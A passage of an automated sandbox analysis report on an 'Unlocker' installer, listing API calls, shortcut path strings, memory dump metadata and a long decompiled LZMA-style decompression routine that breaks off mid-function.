                                                                                                                                                              0x00402106
                                                                                                                                                              0x0040210f
                                                                                                                                                              0x00402114
                                                                                                                                                              0x00402116
                                                                                                                                                              0x00402126
                                                                                                                                                              0x00402135
                                                                                                                                                              0x00402137
                                                                                                                                                              0x00402143
                                                                                                                                                              0x00402143
                                                                                                                                                              0x00402135
                                                                                                                                                              0x00402145
                                                                                                                                                              0x0040214b
                                                                                                                                                              0x0040214b
                                                                                                                                                              0x0040214e
                                                                                                                                                              0x00402154
                                                                                                                                                              0x00402159
                                                                                                                                                              0x0040216e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402159
                                                                                                                                                              0x00402164
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Uninstall.lnk,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Uninstall.lnk, xrefs: 00402116, 00402120, 0040213C
                                                                                                                                                              • C:\Program Files\Unlocker, xrefs: 004020AB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                              • String ID: C:\Program Files\Unlocker$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Uninstall.lnk
                                                                                                                                                              • API String ID: 123533781-2677551611
                                                                                                                                                              • Opcode ID: 71453fb45c89770e4f5e9780d50359adef83bdbe6145f3bfd3e7a5e9e412efc0
                                                                                                                                                              • Instruction ID: ce0b4858a9f81ea3ddc308d80d774a06bef6b406c5dcff46aa6a4b0d76e862c7
                                                                                                                                                              • Opcode Fuzzy Hash: 71453fb45c89770e4f5e9780d50359adef83bdbe6145f3bfd3e7a5e9e412efc0
                                                                                                                                                              • Instruction Fuzzy Hash: AE418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405FA8 Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E00405FA8() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
